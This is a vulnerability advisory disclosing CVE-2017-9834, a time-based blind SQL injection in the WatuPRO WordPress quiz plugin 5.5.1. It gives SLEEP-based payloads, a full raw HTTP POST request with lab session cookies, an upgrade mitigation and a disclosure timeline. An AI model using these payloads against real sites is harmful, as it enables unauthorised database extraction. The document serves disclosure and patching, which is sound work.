#####################################
Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
Exploit Author: Manich Koomsusi
Date: 03-07-2017
Software: WatuPRO
Version: 5.5.1
Website: http://calendarscripts.info/watupro/
Tested on: WordPress 4.7.5
Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
CVE: CVE-2017-9834
#####################################
Description
==================================
SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.
Vulnerability
==================================
This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.
Proof of concept
==================================
Take exams or quizzes and submit to the server in POST method
Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547” the server delay response time around ~5 second.
Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547” the server not delay response time.
############
POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 292
Accept-Language: en-US,en;q=0.5
Host: 192.168.5.189
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
DNT: 1
Connection: close
X-Requested-With: XMLHttpRequest
Referer: http://192.168.5.189/pt/wordpress/
Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
Content-Type: application/x-www-form-urlencoded
action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
#############
Mitigations
==================================
Upgrade to version 5.5.3.7 or later.
Timeline
==================================
2017-06-19: Discovered the bug
2017-06-19: Reported to vendor
2017-06-19: First response from vendor saying software it fixed. But the vendor fix not properly
2017-06-20: Version 5.5.3.7 released “Fixed issue with input validate.”
2017-07-03: Advisory published
Discovered By:
=====================
Manich Koomsusi